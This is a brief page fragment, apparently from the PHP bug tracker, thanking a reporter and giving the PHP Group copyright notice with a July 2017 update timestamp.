Thank you for the report, and for helping us make PHP better.

PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Mon Jul 24 10:01:45 2017 UTC